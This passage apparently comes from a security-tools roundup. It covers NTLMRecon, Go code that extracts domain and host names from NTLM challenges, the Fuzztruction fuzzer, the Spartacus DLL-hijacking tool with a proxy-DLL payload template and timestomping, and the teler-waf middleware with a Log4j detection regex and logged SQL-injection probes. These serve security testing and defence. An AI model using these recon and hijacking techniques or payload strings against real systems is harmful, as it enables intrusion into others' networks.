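	return base64.StdEncoding.EncodeToString(msg)
}

func decodeUTF16(b []byte) string {
	u := make([]uint16, len(b)/2)
	for i := range u {
		u[i] = binary.LittleEndian.Uint16(b[2*i:])
	}
	return string(utf16.Decode(u))
}

func main() {
	req, _ := http.NewRequest("GET", "https://autodiscover.contoso.com/EWS/", nil)
	req.Header.Set("Authorization", "NTLM "+negotiate())
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	for _, h := range resp.Header.Values("WWW-Authenticate") {
		if !strings.HasPrefix(h, "NTLM ") {
			continue
		}
		challenge, err := base64.StdEncoding.DecodeString(strings.TrimPrefix(h, "NTLM "))
		if err != nil || len(challenge) < 48 {
			continue
		}
		// The CHALLENGE_MESSAGE stores the TargetInfo AV-pair offset at bytes 44..47.
		names := map[uint16]string{1: "netbiosComputerName", 2: "netbiosDomainName",
			3: "dnsComputerName", 4: "dnsDomainName", 5: "forestName"}
		p := int(binary.LittleEndian.Uint32(challenge[44:48]))
		for p+4 <= len(challenge) {
			id := binary.LittleEndian.Uint16(challenge[p:])
			l := int(binary.LittleEndian.Uint16(challenge[p+2:]))
			if id == 0 || p+4+l > len(challenge) { // MsvAvEOL or malformed
				break
			}
			if name, ok := names[id]; ok {
				fmt.Printf("%s: %s\n", name, decodeUTF16(challenge[p+4:p+4+l]))
			}
			p += 4 + l
		}
	}
}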


Why build a new version of this capability?

We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang and we didn't want to have to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected, etc.

Installation

The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.

go install github.com/praetorian-inc/NTLMRecon/cmd/NTLMRecon@latest

Usage

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:

NTLMRecon -t https://autodiscover.contoso.com

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:

NTLMRecon -t https://autodiscover.contoso.com -o json

Example JSON Output

Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:

{
"url": "https://autodiscover.contoso.com/EWS/",
"ntlm": {
"netbiosComputerName": "MSEXCH1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "na.contoso.local",
"dnsComputerName": "msexch1.na.contoso.local",
"forestName": "contoso.local"
}
}
➜  ~ NTLMRecon -t https://adfs.contoso.com -o json | jq
{
"url": "https://adfs.contoso.com/adfs/services/trust/2005/windowstransport",
"ntlm": {
"netbiosComputerName": "MSFED1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "corp.contoso.com",
"dnsComputerName": "MSEXCH1.corp.contoso.com",
"forestName": "contoso.com"
}
}
➜ ~ NTLMRecon -t https://autodiscover.contoso.com
https://autodiscover.contoso.com/Autodiscover
https://autodiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root
https://autodiscover.contoso.com/Autodiscover/Autodiscover.xml
https://autodiscover.contoso.com/EWS/
https://autodiscover.contoso.com/OAB/
https://autodiscover.contoso.com/Rpc/
➜ ~

Potential Additional Features

Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:

  • Concurrency and Performance Improvements: There could be some additional improvements to concurrency and performance. Currently, the tool makes HTTP requests sequentially, waiting for each request to complete before issuing the next.
  • Batch Scanning Functionality: Another idea would be to extend the NTLMRecon utility to accept a list of hosts from standard input. One usage scenario for this could be an attacker running a combination of "subfinder | httpx | NTLMRecon" to enumerate HTTP servers and then identify NTLM authentication endpoints that are exposed externally across an entire attack surface.
  • One-off Data Collection Capability: A user may wish to perform one-off data collection targeting a specific endpoint which is currently not supported by NTLMRecon.
  • User-Agent Randomization or Control: A user may wish to randomize the user-agents used to make requests. Alternatively when targeting Microsoft Exchange servers sometimes using a user-agent with a mobile client or legacy third-party email client can allow requests to the /EWS/Exchange.asmx endpoint through, etc.

References

[1] https://www.praetorian.com/blog/automating-the-discovery-of-ntlm-authentication-endpoints/



Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target

By: Zion3R

Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called the consumer, but triggers unexpected behavior in deeper program logic. This allows us to fuzz even targets that utilize cryptographic primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.

For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments submodule documentation after reading this document.

Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.


Quickstart

# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of the experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# downloaded).
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# your own targets (use the next command instead).
./env/pull-prebuilt.sh

# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh

# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env/start.sh

# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh

# Running start.sh a second time will automatically build the fuzzer.

# See `Fuzzing a Target using Fuzztruction` below for further instructions.

Components

Fuzztruction contains the following core components:

Scheduler

The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler directory.
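
As a mental model, such a queue entry could be sketched as follows (an illustrative Go sketch of the data structure only; the real scheduler is part of the cargo-built codebase and its types differ):

package main

import "fmt"

// A mutation targets one patch point in the generator and describes how
// its data operation is altered (illustrative).
type Mutation struct {
	PatchPointID uint64
	Mask         []byte // e.g. XORed into the operation's output
}

// QueueEntry is one test case: the seed fed to the generator plus all
// mutations applied to the generator, instead of a single input file.
type QueueEntry struct {
	Seed      []byte
	Mutations []Mutation
}

func main() {
	q := []QueueEntry{{
		Seed:      []byte("seed.png"),
		Mutations: []Mutation{{PatchPointID: 42, Mask: []byte{0xff}}},
	}}
	fmt.Printf("%d queue entries, first has %d mutation(s)\n", len(q), len(q[0].Mutations))
}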

Generator

The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.

The implementation of the generator can be found in the generator directory. It consists of two components that are explained in the following.

Compiler Pass

The compiler pass (generator/pass) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.

The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs, which we also published on crates.io.

During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.

Agent

The agent, implemented in generator/agent, runs in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are implementing a forkserver and communicating with the scheduler. Based on the instructions passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.

Consumer

The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.

Preparing the Runtime Environment (Docker Image)

Before using Fuzztruction, the runtime environment, which comes as a Docker image, is required. This image can be obtained by building it yourself locally or by pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository and all sub-repositories must be cloned:

git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

Local Build

The Fuzztruction runtime environment can be built by executing env/build.sh. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm directory.

Pre-built

In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh.

The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments submodule.

Managing the Runtime Environment Lifecycle

After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzer's environment lifecycle is managed by a set of scripts located in the env folder.

Script Description
./env/start.sh Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-build to local build or the other way around, stop.sh must be executed first.
./env/stop.sh This stops the container. Remember to call this after rebuilding the image.

Using start.sh, an arbitrary number of shells can be spawned in the container. Visual Studio Code's Containers extension also allows you to work conveniently inside the Docker container.

Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.

Runtime Environment Details

This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user and has passwordless sudo access by default.

Permissions: The Docker images' user is named user and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case since the image was built on another machine. This must be considered when exchanging data with the host.

Inside the container, the following paths are (bind) mounted from the host:

Container Path Host Path Note
/home/user/fuzztruction ./ Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host.
/home/user/shared ./ Used to exchange data with the host.
/home/user/.zshrc ./data/zshrc -
/home/user/.zsh_history ./data/zsh_history -
/home/user/.bash_history ./data/bash_history -
/home/user/.config/nvim/init.vim ./data/init.vim -
/home/user/.config/Code ./data/vscode-data Used to persist Visual Studio Code config between container restarts.
/ssh-agent $SSH_AUTH_SOCK Allows using the SSH-Agent inside the container if it runs on the host.
/home/user/.gitconfig /home/$USER/.gitconfig Use gitconfig from the host, if there is any config.
/ccache ./data/ccache Used to persist ccache cache between container restarts.

Usage

After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.

Building Fuzztruction

For building Fuzztruction, it is sufficient to call cargo build in /home/user/fuzztruction. This will build all components described in the Components section. The most interesting build artifacts are the following:

Artifacts Description
./generator/pass/fuzztruction-source-llvm-pass.so The LLVM pass is used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell.
./generator/pass/fuzztruction-source-clang-fast A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agents' init method into the generator's main.
./target/debug/libgenerator_agent.so The agent that is injected into the generator application.
./target/debug/fuzztruction The fuzztruction binary representing the actual fuzzer.

Fuzzing a Target using Fuzztruction

We will use libpng as an example to showcase Fuzztruction's capabilities. Since libpng is relatively small and has no external dependencies, it is not required to use the pre-built image for the following steps. However, especially on mobile CPUs, building the AFL++ binary may take up to several hours because of the collision-free coverage map encoding feature and compare splitting.

Building the Target

Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/ directory and execute ./build.sh libpng. This will pull the source and start the build according to the steps defined in libpng/config.sh.

Benchmarking the Target

Using the following command

sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml  --purge --show-output benchmark -i 100

allows testing whether the target works. Each target is defined using a YAML configuration file. The files are located in the configurations directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml file is extensively documented.

Troubleshooting

If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.

  • Passing --show-output to fuzztruction allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.
  • Setting AFL_DEBUG in the env section of the sink in the YAML config can give you a more detailed output regarding the consumer.
  • Executing the generator and consumer using the same flags as in the config file might reveal any typo in the command line used to execute the application. In the case of using LD_PRELOAD, double check the provided paths.

Running the Fuzzer

To start the fuzzing process, executing the following command is sufficient:

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m

This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory attribute in the target's config file. In case of pngtopng, the default location is /tmp/pngtopng-pngtopng.

If the working directory already exists, --purge must be passed as an argument to fuzztruction to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz or benchmark.

Combining Fuzztruction and AFL++

For running AFL++ alongside Fuzztruction, the aflpp subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m

for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting folder in the working directory. In case AFL++ should be executed independently but based on the same .yml configuration file, the --suffix argument can be used to append a suffix to the working directory of the spawned fuzzer.

Computing Coverage

After the fuzzing run has terminated, the tracer subcommand allows you to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces subdirectory located in the working directory. Each trace contains a zlib compressed JSON object of the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.

The coverage tool located at ./target/debug/coverage can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp in case of the previous example). Executing ./target/debug/coverage /tmp will generate a .csv file that maps time to the number of covered basic blocks and a .json file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.
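
Assuming the trace is, as described, zlib-compressed JSON, a Go sketch for inspecting one trace file might look like the following (the file name and the exact JSON shape, including the ELF-mapping metadata, are assumptions here):

package main

import (
	"compress/zlib"
	"encoding/json"
	"fmt"
	"os"
)

func main() {
	// Hypothetical trace file; the path layout follows the text above.
	f, err := os.Open("/tmp/pngtopng-pngtopng/traces/trace-0")
	if err != nil {
		panic(err)
	}
	defer f.Close()
	r, err := zlib.NewReader(f)
	if err != nil {
		panic(err)
	}
	defer r.Close()
	var addrs []uint64 // assumed: ordered basic-block addresses
	if err := json.NewDecoder(r).Decode(&addrs); err != nil {
		panic(err)
	}
	if len(addrs) > 0 {
		fmt.Printf("%d basic blocks covered, first at %#x\n", len(addrs), addrs[0])
	}
}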



Spartacus - DLL Hijacking Discovery Tool

By: Zion3R


Why "Spartacus"?

If you have seen the film Spartacus from 1960, you will remember the scene where the Romans are asking for Spartacus to give himself up. The moment the real Spartacus stood up, a lot of others stood up as well and claimed to be him using the "I AM SPARTACUS" phrase.

When a process that is vulnerable to DLL Hijacking is asking for a DLL to be loaded, it's kind of asking "WHO IS VERSION.DLL?" and random directories start claiming "I AM VERSION.DLL" and "NO, I AM VERSION.DLL". And thus, Spartacus.

Did you really make yet another DLL Hijacking discovery tool?

...but with a twist: Spartacus utilises the SysInternals Process Monitor and parses raw PML log files. You can leave ProcMon running for hours and discover 2nd- and 3rd-level DLL Hijacking vulnerabilities (i.e. an app that loads another DLL, which loads yet another DLL when you use a specific feature of the parent app). It will also automatically generate proxy DLLs with all relevant exports for vulnerable DLLs.


Features

  • Parsing ProcMon PML files natively. The config (PMC) and log (PML) parsers have been implemented by porting partial functionality to C# from https://github.com/eronnen/procmon-parser/. You can find the format specification here.
  • Spartacus will create proxy DLLs for all missing DLLs that were identified. For instance, if an application is vulnerable to DLL Hijacking via version.dll, Spartacus will create a version.dll.cpp file for you with all the exports included in it. Then you can insert your payload/execution technique and compile.
  • Able to process large PML files and store all DLLs of interest in an output CSV file. Local benchmark processed a 3GB file with 8 million events in 45 seconds.
  • [Defence] Monitoring mode trying to identify running applications proxying calls, as in "DLL Hijacking in progress". This is just to get any low hanging fruit and should not be relied upon.
  • Able to create proxies for export functions in order to avoid using DllMain. This technique was inspired by the walkthrough described at https://www.redteam.cafe/red-team/dll-sideloading/dll-sideloading-not-by-dllmain by Shantanu Khandelwal. For this to work, Ghidra is required.

Screenshots

Spartacus Execution

CSV Output

Output Exports

Export DLL Functions

Usage

Execution Flow

  1. Generates a ProcMon (PMC) config file on the fly, based on the arguments passed. The filters that will be set are:
    • Operation is CreateFile.
    • Path ends with .dll.
    • Process name is not procmon.exe or procmon64.exe.
    • Enable Drop Filtered Events to ensure minimum PML output size.
    • Disable Auto Scroll.
  2. Executes Process Monitor.
  3. Halts execution until the user presses ENTER.
  4. Terminates Process Monitor.
  5. Parses the output Event Log (PML) file.
    1. Creates a CSV file with all the NAME_NOT_FOUND and PATH_NOT_FOUND DLLs.
    2. Compares the DLLs from above and tries to identify the DLLs that were actually loaded.
    3. For every "found" DLL it generates a proxy DLL with all its export functions.

Command Line Arguments

Argument Description
--pml Location (file) to store the ProcMon event log file. If the file exists, it will be overwritten. When used with --existing-log it will indicate the event log file to read from and will not be overwritten.
--pmc Define a custom ProcMon (PMC) file to use. This file will not be modified and will be used as is.
--csv Location (file) to store the CSV output of the execution. This file will include only the DLLs that were marked as NAME_NOT_FOUND, PATH_NOT_FOUND, and were in user-writable locations (it excludes anything in the Windows and Program Files directories)
--exe Define process names (comma separated) that you want to track, helpful when you are interested only in a specific process.
--exports Location (folder) in which all the proxy DLL files will be saved. Proxy DLL files will only be generated if this argument is used.
--procmon Location (file) of the SysInternals Process Monitor procmon.exe or procmon64.exe
--proxy-dll-template Define a DLL template to use for generating the proxy DLL files. Only relevant when --exports is used. All #pragma exports are inserted by replacing the %_PRAGMA_COMMENTS_% string, so make sure your template includes that string in the relevant location.
--existing-log Switch to indicate that Spartacus should process an existing ProcMon event log file (PML). To indicate the event log file use --pml, useful when you have been running ProcMon for hours or used it in Boot Logging.
--all By default any DLLs in the Windows or Program Files directories will be skipped. Use this to include those directories in the output.
--detect Try to identify DLLs that are proxying calls (like 'DLL Hijacking in progress'). This isn't a feature to be relied upon, it's there to get the low hanging fruit.
--verbose Enable verbose output.
--debug Enable debug output.
--generate-proxy Switch to indicate that Spartacus will be creating proxy functions for all identified export functions.
--ghidra Used only with --generate-proxy. Absolute path to Ghidra's 'analyzeHeadless.bat' file.
--dll Used only with --generate-proxy. Absolute path to the DLL you want to proxy.
--output-dir Used only with --generate-proxy. Absolute path to the directory where the solution of the proxy will be stored. This directory should not exist, and will be auto-created.
--only-proxy Used only with --generate-proxy. Comma separated string to indicate functions to clone. Such as 'WTSFreeMemory,WTSFreeMemoryExA,WTSSetUserConfigA'

Examples

Collect all events and save them into C:\Data\logs.pml. All vulnerable DLLs will be saved as C:\Data\VulnerableDLLFiles.csv and all proxy DLLs in C:\Data\DLLExports.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose

Collect events only for Teams.exe and OneDrive.exe.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe"

Collect events only for Teams.exe and OneDrive.exe, and use a custom proxy DLL template at C:\Data\myProxySkeleton.cpp.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe" --proxy-dll-template C:\Data\myProxySkeleton.cpp

Collect events only for Teams.exe and OneDrive.exe, but don't generate proxy DLLs.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --verbose --exe "Teams.exe,OneDrive.exe"

Parse an existing PML event log output, save output to CSV, and generate proxy DLLs.

--existing-log --pml C:\MyData\SomeBackup.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports

Run in monitoring mode and try to detect any applications that are proxying DLL calls.

--detect

Create proxies for all identified export functions.

--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose

Create a proxy only for a specific export function.

--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose --only-proxy "ExpandEnvironmentStringsForUserW"

Note: When generating proxies for export functions, the solution that is created also replicates VERSIONINFO and timestomps the target DLL to match the date of the source one (using PowerShell).

Proxy DLL Template

Below is the template used when generating proxy DLLs; the generated #pragma statements are inserted by replacing the %_PRAGMA_COMMENTS_% string.

The only thing to be aware of is that the proxy DLL will use a hardcoded path to the DLL it forwards to, rather than trying to locate it dynamically.

#pragma once

%_PRAGMA_COMMENTS_%

#include <windows.h>
#include <string>
#include <atlstr.h>

VOID Payload() {
// Run your payload here.
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
Payload();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

If you wish to use your own template, just make sure the %_PRAGMA_COMMENTS_% is in the right place.

Contributions

Whether it's a typo, a bug, or a new feature, Spartacus is very open to contributions as long as we agree on the following:

  • You are OK with the MIT license of this project.
  • Before creating a pull request, create an issue so it can be discussed before you do any work, as internal development is not tracked via the public GitHub repository. Otherwise you risk having a pull request rejected if, for example, we are already working on the same or a similar feature, or for any other reason.

Credits



Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications

By: Zion3R

teler-waf is a comprehensive security solution for Go-based web applications. It acts as an HTTP middleware, providing an easy-to-use interface for integrating IDS functionality with teler IDS into existing Go applications. By using teler-waf, you can help protect against a variety of web-based attacks, such as cross-site scripting (XSS) and SQL injection.

The package comes with a standard net/http.Handler, making it easy to integrate into your application's routing. When a client makes a request to a route protected by teler-waf, the request is first checked against the teler IDS to detect known malicious patterns. If no malicious patterns are detected, the request is then passed through for further processing.

In addition to providing protection against web-based attacks, teler-waf can also help improve the overall security and integrity of your application. It is highly configurable, allowing you to tailor it to fit the specific needs of your application.


See also:

  • kitabisa/teler: Real-time HTTP intrusion detection.
  • dwisiswant0/cox: Cox is bluemonday-wrapper to perform a deep-clean and/or sanitization of (nested-)interfaces from HTML to prevent XSS payloads.

Features

Some core features of teler-waf include:

  • HTTP middleware for Go web applications.
  • Integration of teler IDS functionality.
  • Detection of known malicious patterns using the teler IDS.
    • Common web attacks, such as cross-site scripting (XSS) and SQL injection, etc.
    • CVEs, covers known vulnerabilities and exploits.
    • Bad IP addresses, such as those associated with known malicious actors or botnets.
    • Bad HTTP referers, such as those that are not expected based on the application's URL structure or are known to be associated with malicious actors.
    • Bad crawlers, covers requests from known bad crawlers or scrapers, such as those that are known to cause performance issues or attempt to extract sensitive information from the application.
    • Directory bruteforce attacks, such as by trying common directory names or using dictionary attacks.
  • Configuration options to whitelist specific types of requests based on their URL or headers.
  • Easy integration with many frameworks.
  • High configurability to fit the specific needs of your application.

Overall, teler-waf provides a comprehensive security solution for Go-based web applications, helping to protect against web-based attacks and improve the overall security and integrity of your application.

Install

To install teler-waf in your Go application, run the following command to download and install the teler-waf package:

go get github.com/kitabisa/teler-waf

Usage

Here is an example of how to use teler-waf in a Go application:

  1. Import the teler-waf package in your Go code:
import "github.com/kitabisa/teler-waf"
  2. Use the New function to create a new instance of the Teler type. This function takes a variety of optional parameters that can be used to configure teler-waf to suit the specific needs of your application.
waf := teler.New()
  3. Use the Handler method of the Teler instance to create a net/http.Handler. This handler can then be used in your application's HTTP routing to apply teler-waf's security measures to specific routes.
handler := waf.Handler(http.HandlerFunc(yourHandlerFunc))
  4. Use the handler in your application's HTTP routing to apply teler-waf's security measures to specific routes.
http.Handle("/path", handler)

That's it! You have configured teler-waf in your Go application.

Options:

For a list of the options available to customize teler-waf, see the teler.Options struct.

Examples

Here is an example of how to customize the options and rules for teler-waf:

// main.go
package main

import (
"net/http"

"github.com/kitabisa/teler-waf"
"github.com/kitabisa/teler-waf/request"
"github.com/kitabisa/teler-waf/threat"
)

var myHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to protect
// with teler-waf's security measures.
w.Write([]byte("hello world"))
})

var rejectHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to be rejected
// if the teler-waf's security measures are triggered.
http.Error(w, "Sorry, your request has been denied for security reasons.", http.StatusForbidden)
})

func main() {
// Create a new instance of the Teler type using the New function
// and configure it using the Options struct.
telerMiddleware := teler.New(teler.Options{
// Exclude specific threats from being checked by the teler-waf.
Excludes: []threat.Threat{
threat.BadReferrer,
threat.BadCrawler,
},
// Specify whitelisted URIs (path & query parameters), headers,
// or IP addresses that will always be allowed by the teler-waf.
Whitelists: []string{
`(curl|Go-http-client|okhttp)/*`,
`^/wp-login\.php`,
`(?i)Referer: https?:\/\/www\.facebook\.com`,
`192\.168\.0\.1`,
},
// Specify custom rules for the teler-waf to follow.
Customs: []teler.Rule{
{
// Give the rule a name for easy identification.
Name: "Log4j Attack",
// Specify the logical operator to use when evaluating the rule's conditions.
Condition: "or",
// Specify the conditions that must be met for the rule to trigger.
Rules: []teler.Condition{
{
// Specify the HTTP method that the rule applies to.
Method: request.GET,
// Specify the element of the request that the rule applies to
// (e.g. URI, headers, body).
Element: request.URI,
// Specify the pattern to match against the element of the request.
Pattern: `\$\{.*:\/\/.*\/?\w+?\}`,
},
},
},
},
// Specify the file path to use for logging.
LogFile: "/tmp/teler.log",
})

// Set the rejectHandler as the handler for the telerMiddleware.
telerMiddleware.SetHandler(rejectHandler)

// Create a new handler using the handler method of the Teler instance
// and pass in the myHandler function for the route we want to protect.
app := telerMiddleware.Handler(myHandler)

// Use the app handler as the handler for the route.
http.ListenAndServe("127.0.0.1:3000", app)
}

Warning: When using a whitelist, any request that matches it, regardless of the type of threat it poses, will be passed through without further analysis.

To illustrate, suppose you set up a whitelist to permit requests containing a certain string. In the event that a request contains that string but also includes a payload such as an SQL injection or cross-site scripting (XSS) attack, the request may not be thoroughly analyzed for common web attack threats and will be swiftly returned. See issue #25.

For more examples of how to use teler-waf or integrate it with any framework, take a look at examples/ directory.

Development

By default, teler-waf caches all incoming requests for 15 minutes & clears them every 20 minutes to improve performance. However, if you're still customizing the settings to match the requirements of your application, you can disable caching during development by setting the development mode option to true. This will prevent incoming requests from being cached and can be helpful for debugging purposes.

// Create a new instance of the Teler type using
// the New function & enable development mode option.
telerMiddleware := teler.New(teler.Options{
Development: true,
})

Logs

Here is an example of what the log lines would look like if teler-waf detects a threat on a request:

{"level":"warn","ts":1672261174.5995026,"msg":"bad crawler","id":"654b85325e1b2911258a","category":"BadCrawler","request":{"method":"GET","path":"/","ip_addr":"127.0.0.1:37702","headers":{"Accept":["*/*"],"User-Agent":["curl/7.81.0"]},"body":""}}
{"level":"warn","ts":1672261175.9567692,"msg":"directory bruteforce","id":"b29546945276ed6b1fba","category":"DirectoryBruteforce","request":{"method":"GET","path":"/.git","ip_addr":"127.0.0.1:37716","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}
{"level":"warn","ts":1672261177.1487508,"msg":"Detects common comment types","id":"75412f2cc0ec1cf79efd","category":"CommonWebAttack","request":{"method":"GET","path":"/?id=1%27% 20or%201%3D1%23","ip_addr":"127.0.0.1:37728","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}

The id is a unique identifier that is generated when a request is rejected by teler-waf. It is included in the HTTP response headers of the request (X-Teler-Req-Id), and can be used to troubleshoot issues with requests that are being made to the website.

For example, if a request to a website returns an HTTP error status code, such as a 403 Forbidden, the teler request ID can be used to identify the specific request that caused the error and help troubleshoot the issue.

Teler request IDs are used by teler-waf to track requests made to its web application and can be useful for debugging and analyzing traffic patterns on a website.
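
A minimal client-side Go sketch of retrieving that ID from a rejected response (the route and port echo the earlier example; only the X-Teler-Req-Id header name comes from the documentation above):

package main

import (
	"fmt"
	"net/http"
)

func main() {
	// Hypothetical route protected by teler-waf.
	resp, err := http.Get("http://127.0.0.1:3000/.git")
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	if resp.StatusCode == http.StatusForbidden {
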